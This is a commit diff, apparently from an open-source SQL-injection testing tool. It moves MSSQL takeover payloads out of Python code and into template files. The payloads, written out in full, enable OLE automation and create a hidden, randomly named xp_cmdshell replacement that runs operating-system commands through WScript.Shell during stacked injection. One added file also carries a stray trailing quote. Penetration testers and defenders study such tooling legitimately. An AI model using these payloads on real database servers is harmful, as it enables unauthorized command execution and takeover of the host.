working on #51

2025-01-24 08:14:24 +03:00 · 2012-07-02 15:28:19 +01:00 · 2012-07-02 15:28:19 +01:00 · fd4cfb0cc0
commit fd4cfb0cc0
parent 7335072ab8
3 changed files with 16 additions and 13 deletions
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -41,23 +41,14 @@ class xp_cmdshell:
        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")

-            cmd += "EXEC master..sp_configure 'show advanced options',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE;"
-            cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE"
+            cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
            inject.goStacked(agent.runAsDBMSUser(cmd))

        self.__randStr = randomStr(lowercase=True)
-        self.__xpCmdshellNew = randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
+        self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
+        self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew

-        cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
-        cmd += "set @%s='" % self.__randStr
-        cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
-        cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
-        cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
-        cmd += "EXEC sp_OADestroy @ID';"
-        cmd += "EXEC master..sp_executesql @%s" % self.__randStr
+        cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)

        if Backend.isVersionWithin(("2005", "2008")):
            cmd += ";RECONFIGURE WITH OVERRIDE"
--- a/procs/mssqlserver/activate_sp_oacreate.txt
+++ b/procs/mssqlserver/activate_sp_oacreate.txt
@ -0,0 +1,4 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'ole automation procedures',1;
+RECONFIGURE WITH OVERRIDE"
--- a/procs/mssqlserver/create_new_xp_cmdshell.txt
+++ b/procs/mssqlserver/create_new_xp_cmdshell.txt
@ -0,0 +1,8 @@
+DECLARE @%RANDSTR% nvarchar(999);
+set @%RANDSTR%='
+CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int 
+EXEC sp_OACreate ''WScript.Shell'',@ID OUT 
+EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 
+EXEC sp_OADestroy @ID';
+EXEC master..sp_executesql @%RANDSTR%
+